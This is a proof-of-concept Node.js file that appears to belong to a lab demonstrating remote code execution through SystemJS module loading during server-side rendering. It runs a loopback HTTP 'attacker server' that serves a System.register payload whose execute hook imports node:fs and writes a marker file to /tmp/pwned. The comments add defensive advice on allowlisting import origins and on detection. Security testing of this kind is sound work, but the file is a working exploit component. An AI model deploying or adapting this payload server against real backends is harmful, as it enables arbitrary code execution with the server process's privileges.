POC / attacker-server.cjs CJS
'use strict';

const http = require('http');

// Demo configuration. The listener address is loopback, so the lab server is
// reachable only from the machine it runs on.
const host = '127.0.0.1';
const port = 9001;

// Marker location. The payload only creates this directory and writes one
// text file into it; the file's existence is the evidence that the module
// body ran inside the importing process.
const proofDir = '/tmp/pwned';
const proofFile = `${proofDir}/systemjs-ssr-rce.txt`;

// Source text of the module served at /payload.js, in SystemJS's
// System.register format. Its execute() hook dynamically imports node:fs,
// writes the marker file, and only then exports a `render` function that
// returns static HTML.
// JSON.stringify() embeds the two paths as quoted, escaped JS string literals.
// NOTE(review): the consuming backend is not part of this file. Presumably it
// loads a caller-influenced URL through SystemJS during server-side rendering;
// the defensive takeaway is that any module a server imports runs with the
// full privileges of that Node process, so import targets need a fixed
// allowlist of trusted origins.
const payload = `System.register([], function (_export) {
  return {
    execute: function () {
      return import('node:fs').then(function (fs) {
        fs.mkdirSync(${JSON.stringify(proofDir)}, { recursive: true });
        fs.writeFileSync(${JSON.stringify(proofFile)}, "ssr payload executed in backend node process\\n");
        _export('render', function () {
          return '<h1>Remote component rendered</h1><p>The backend executed the imported module.</p>';
        });
      });
    }
  };
});`;

// Minimal HTTP handler for the lab. Only the path is inspected: any request
// method and any query string on /payload.js receives the module text, and
// every other path receives a plain-text usage hint.
const server = http.createServer((request, response) => {
  const { pathname } = new URL(request.url, `http://${host}:${port}`);

  if (pathname !== '/payload.js') {
    response.writeHead(200, { 'content-type': 'text/plain' });
    response.end('attacker server: GET /payload.js\n');
    return;
  }

  // Served as JavaScript with a wildcard CORS header so a cross-origin
  // module loader accepts the response.
  response.writeHead(200, {
    'content-type': 'application/javascript',
    'access-control-allow-origin': '*',
  });
  response.end(payload);

  // The peer address logged here is the process that fetched the module.
  // For defenders, the matching signal on the victim side is a backend
  // making an outbound HTTP request for script content from an origin it
  // does not normally talk to.
  console.log(`[attacker] served payload to ${request.socket.remoteAddress}`);
});

// Start listening on the configured host and port, then print the base URL
// and the payload URL for the operator of the lab.
server.listen(port, host, () => {
  const baseUrl = `http://${host}:${port}`;
  console.log(`[attacker] listening on ${baseUrl}`);
  console.log(`[attacker] payload URL: ${baseUrl}/payload.js`);
});